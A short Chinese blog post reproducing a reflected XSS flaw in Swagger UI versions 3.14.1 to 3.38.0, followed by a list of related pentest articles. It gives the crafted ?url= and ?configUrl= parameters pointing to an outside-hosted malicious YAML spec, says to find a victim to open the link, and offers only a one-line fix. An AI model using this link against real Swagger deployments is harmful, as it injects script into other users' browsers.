swagger xss漏洞复现

扣脚大汉在网络2024-04-27 9:39

swagger xss漏洞复现

文章目录

漏洞介绍

Swagger UI 有一个有趣的功能,允许您提供 API 规范的 URL - 一个 yaml 或 json 文件,将被获取并显示给用户

根本原因非常简单 - 一个过时的库DomPurify

影响版本

XSS 影响的 Swagger UI 版本:>=3.14.1 < 3.38.0

实现原理

利用允许提供json文件的原理访问公网网站进行弹窗

json网站:https://jumpy-floor.surge.sh/test.yaml

拼接方式

?url=https://your_api_spec/spec.yaml

?configUrl=https://your_api_spec/file.json

漏洞复现

随机找一位受害者访问

进行拼接?url=https://jumpy-floor.surge.sh/test.yaml

弹窗

修复建议:

升级到最新

相关推荐
morris13129 分钟前
【SpringBoot】Xss的常见攻击方式与防御手段
java·spring boot·xss·csp
渗透测试老鸟-九青1 天前
【$15000】 通过监控调试模式实现RCE
安全·web安全·网络安全·渗透·漏洞
假客套2 天前
【dvwa靶场:XSS系列】XSS (Reflected)低-中-高级别,通关啦
网络安全·xss·dvwa靶场·dvwa xss靶场·web渗透、
假客套2 天前
【dvwa靶场:XSS系列】XSS (DOM) 低-中-高级别,通关啦
网络安全·xss·web渗透·dvwa靶场·dvwa xss靶场
阿宝分享技术2 天前
从xss到任意文件读取
前端·xss
儋州小丑,原号没了,靠北3 天前
XSS-libs
前端·xss
扛枪的书生4 天前
Web 靶场笔记-bWAPP
渗透·web·kali
Yue1one5 天前
Xss_less靶场攻略(1-18)
网络安全·xss
残月只会敲键盘5 天前
ctfshow--xss靶场web327-web333(一命速通不了的靶场)
前端·web3·xss
小野猪都有白菜拱7 天前
XSS小游戏【1-13关】
xss
热门推荐
01【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明03组基轨迹建模 GBTM的介绍与实现(Stata 或 R)04【AIGC】重塑未来的科技巨轮05全面解析:构建基于深度学习的安全帽检测系统(UI界面+YOLO代码+数据集)06【经验分享】Ubuntu22.04安装微信(linux官方版)07基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测08Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO09RAG 实践- Ollama+RagFlow 部署本地知识库10红米手机使用google play